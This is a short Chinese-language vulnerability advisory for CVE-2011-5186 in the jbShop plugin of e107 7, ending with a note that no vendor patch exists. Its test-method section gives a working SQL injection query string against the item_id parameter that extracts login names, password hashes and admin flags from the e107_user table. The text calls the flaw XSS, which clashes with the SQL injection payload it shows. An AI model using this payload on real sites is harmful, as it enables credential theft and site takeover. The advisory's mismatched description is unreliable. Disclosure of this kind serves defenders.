发布日期:2012-09-23
更新日期:2012-10-05
受影响系统:
e107 e107 7
描述:
--------------------------------------------------------------------------------
CVE ID: CVE-2011-5186
e107是用php编写的内容管理系统。
e107 7版本的jbShop插件jbshop.php内存在XSS漏洞,可允许远程攻击者通过item_id参数注入任意Web脚本或HTML。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Robert Cooper ()提供了如下测试方法:
PoC:
?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--
建议:
--------------------------------------------------------------------------------
厂商补丁:
e107
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: